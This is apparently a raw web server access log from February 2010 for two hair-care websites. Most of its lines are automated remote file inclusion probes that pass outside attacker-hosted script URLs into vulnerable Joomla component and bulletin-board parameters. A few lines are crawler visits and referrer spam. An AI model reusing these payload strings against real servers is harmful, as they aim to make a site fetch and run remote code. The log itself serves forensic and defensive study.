221.143.40.35 - - [08/Feb/2010:01:25:50 -0800] "GET /logs/access_100118.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:27:04 -0800] "GET //?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:27:05 -0800] "GET /logs///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:27:12 -0800] "GET /logs/access_100104.log%20%20///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.174.48.203 - - [08/Feb/2010:01:28:10 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
69.174.48.203 - - [08/Feb/2010:01:28:10 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
69.174.48.203 - - [08/Feb/2010:01:28:10 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
74.50.85.229 - - [08/Feb/2010:01:29:47 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.50.85.229 - - [08/Feb/2010:01:29:47 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.50.85.229 - - [08/Feb/2010:01:29:51 -0800] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.50.85.229 - - [08/Feb/2010:01:30:02 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.50.85.229 - - [08/Feb/2010:01:30:02 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.50.85.229 - - [08/Feb/2010:01:30:02 -0800] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.176.226.164 - - [08/Feb/2010:01:30:12 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:01:30:12 -0800] "GET /logs/bbs//skin/zero_vote/ask_password.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:01:30:12 -0800] "GET /logs/access_091123.log%20%20/bbs//skin/zero_vote/ask_password.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.115.111.245 - - [08/Feb/2010:01:30:28 -0800] "GET /logs/?S=A HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
74.50.85.229 - - [08/Feb/2010:01:30:31 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.50.85.229 - - [08/Feb/2010:01:30:31 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.50.85.229 - - [08/Feb/2010:01:30:31 -0800] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.115.111.245 - - [08/Feb/2010:01:30:32 -0800] "GET /logs/access_090330.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [08/Feb/2010:01:30:36 -0800] "GET /logs/access_090406.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [08/Feb/2010:01:30:40 -0800] "GET /logs/access_090413.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [08/Feb/2010:01:30:45 -0800] "GET /logs/access_090420.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [08/Feb/2010:01:30:50 -0800] "GET /logs/access_090427.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [08/Feb/2010:01:30:56 -0800] "GET /logs/access_090504.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [08/Feb/2010:01:31:01 -0800] "GET /logs/access_090511.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [08/Feb/2010:01:31:06 -0800] "GET /logs/access_090518.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [08/Feb/2010:01:31:11 -0800] "GET /logs/access_090525.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
81.176.226.164 - - [08/Feb/2010:01:31:13 -0800] "GET /logs/access_091207.log%20%20/bbs//skin/zero_vote/ask_password.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.174.48.203 - - [08/Feb/2010:01:31:39 -0800] "GET /logs/access_100111.log/delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:33:00 -0800] "GET /logs/access_100125.log%20%20/////skin/ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.221.175.60 - - [08/Feb/2010:01:33:09 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
89.221.175.60 - - [08/Feb/2010:01:33:09 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
89.221.175.60 - - [08/Feb/2010:01:33:09 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
81.176.226.164 - - [08/Feb/2010:01:34:26 -0800] "GET /logs/access_091123.log/bbs//skin/zero_vote/ask_password.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:01:34:46 -0800] "GET /logs/access_091207.log/bbs//skin/zero_vote/ask_password.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.226.134.29 - - [08/Feb/2010:01:35:10 -0800] "GET /logs/access.log/delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
200.226.134.29 - - [08/Feb/2010:01:35:11 -0800] "GET /delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
200.226.134.29 - - [08/Feb/2010:01:35:11 -0800] "GET /logs/delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
89.221.175.60 - - [08/Feb/2010:01:35:15 -0800] "GET /logs/access_100111.log/delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
200.226.134.29 - - [08/Feb/2010:01:35:29 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
200.226.134.29 - - [08/Feb/2010:01:35:29 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
200.226.134.29 - - [08/Feb/2010:01:35:29 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
221.143.40.35 - - [08/Feb/2010:01:36:08 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
221.143.40.35 - - [08/Feb/2010:01:36:08 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
221.143.40.35 - - [08/Feb/2010:01:36:08 -0800] "GET /logs/access_100111.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:01:36:49 -0800] "GET /logs/access_100118.log////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:01:36:49 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 927 "-" "Mozilla/5.0" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:01:36:49 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "growlonghairfast.com"
69.163.202.84 - - [08/Feb/2010:01:37:12 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 927 "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.163.202.84 - - [08/Feb/2010:01:37:13 -0800] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.163.202.84 - - [08/Feb/2010:01:37:13 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.212.226.210 - - [08/Feb/2010:01:37:31 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "freehairsecrets.com"
91.212.226.210 - - [08/Feb/2010:01:37:31 -0800] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "freehairsecrets.com"
69.163.202.84 - - [08/Feb/2010:01:37:39 -0800] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.226.134.29 - - [08/Feb/2010:01:37:43 -0800] "GET /logs/access_100125.log/delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
200.226.134.29 - - [08/Feb/2010:01:37:44 -0800] "GET /delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
200.226.134.29 - - [08/Feb/2010:01:37:44 -0800] "GET /logs/delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:01:38:51 -0800] "GET /logs/access_100118.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:01:39:41 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 927 "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.176.226.164 - - [08/Feb/2010:01:39:41 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.176.226.164 - - [08/Feb/2010:01:39:50 -0800] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.163.202.84 - - [08/Feb/2010:01:39:59 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 927 "-" "Mozilla/5.0" "growlonghairfast.com"
69.163.202.84 - - [08/Feb/2010:01:39:59 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "growlonghairfast.com"
69.163.202.84 - - [08/Feb/2010:01:39:59 -0800] "GET /logs/access_100118.log////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:01:41:19 -0800] "GET /logs/access_100111.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:01:41:19 -0800] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.176.226.164 - - [08/Feb/2010:01:41:19 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 927 "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.176.226.164 - - [08/Feb/2010:01:41:19 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.163.202.84 - - [08/Feb/2010:01:41:57 -0800] "GET /logs/access_100118.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:01:42:50 -0800] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.208.14.52 - - [08/Feb/2010:01:43:30 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.208.14.52 - - [08/Feb/2010:01:43:30 -0800] "GET /logs/access_100111.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.208.14.52 - - [08/Feb/2010:01:43:30 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.126 - - [08/Feb/2010:01:43:31 -0800] "GET /logs/access_100118.log////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.126 - - [08/Feb/2010:01:43:31 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.126 - - [08/Feb/2010:01:43:32 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 927 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.126 - - [08/Feb/2010:01:44:00 -0800] "GET /logs/access_100118.log////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.126 - - [08/Feb/2010:01:44:00 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.126 - - [08/Feb/2010:01:44:00 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 927 "-" "Mozilla/5.0" "growlonghairfast.com"
94.102.63.60 - - [08/Feb/2010:01:44:23 -0800] "GET /freehairsecretsphp/viewtopic.php?p=3202 HTTP/1.0" 200 333 "http://casino.ru/online/rating" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "growlonghairfast.com"
209.172.33.230 - - [08/Feb/2010:01:44:25 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.172.33.230 - - [08/Feb/2010:01:44:25 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.172.33.230 - - [08/Feb/2010:01:44:25 -0800] "GET /logs/access_100111.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.72.225.209 - - [08/Feb/2010:01:44:50 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "growlonghairfast.com"
67.195.112.187 - - [08/Feb/2010:01:46:26 -0800] "GET /logs/?N=D HTTP/1.0" 200 4783 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
221.143.40.35 - - [08/Feb/2010:01:47:34 -0800] "GET /logs/access_091207.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
221.143.40.35 - - [08/Feb/2010:01:47:34 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
221.143.40.35 - - [08/Feb/2010:01:47:34 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.126 - - [08/Feb/2010:01:48:12 -0800] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.38.136.126 - - [08/Feb/2010:01:48:12 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.38.136.126 - - [08/Feb/2010:01:48:12 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 927 "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.145.178 - - [08/Feb/2010:01:49:09 -0800] "GET /bbs/skin/ggambo7002_board/setup.php//skin/ggambo7002_board/write.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.145.178 - - [08/Feb/2010:01:49:09 -0800] "GET /logs/access_091207.log//bbs/skin/ggambo7002_board/setup.php//skin/ggambo7002_board/write.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.145.178 - - [08/Feb/2010:01:49:09 -0800] "GET /logs//bbs/skin/ggambo7002_board/setup.php//skin/ggambo7002_board/write.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
221.143.40.35 - - [08/Feb/2010:01:50:39 -0800] "GET /logs/access_091214.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
221.143.40.35 - - [08/Feb/2010:01:50:39 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
221.143.40.35 - - [08/Feb/2010:01:50:39 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
221.143.40.35 - - [08/Feb/2010:01:51:06 -0800] "GET /logs/access_100111.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:53:36 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.38.136.125 - - [08/Feb/2010:01:53:41 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 927 "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.38.136.125 - - [08/Feb/2010:01:53:44 -0800] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.208.14.52 - - [08/Feb/2010:01:54:15 -0800] "GET /logs/access_100111.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.226.134.29 - - [08/Feb/2010:01:54:25 -0800] "GET /logs/access_100111.log/delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:55:02 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 927 "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.38.136.125 - - [08/Feb/2010:01:55:02 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.38.136.125 - - [08/Feb/2010:01:55:03 -0800] "GET /logs/access_100125.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:55:14 -0800] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.145.178 - - [08/Feb/2010:01:55:48 -0800] "GET /logs/access_091207.log///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.145.178 - - [08/Feb/2010:01:55:48 -0800] "GET /logs///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.145.178 - - [08/Feb/2010:01:55:48 -0800] "GET //skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:57:31 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 927 "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.38.136.125 - - [08/Feb/2010:01:57:31 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.freehairsecrets.com"
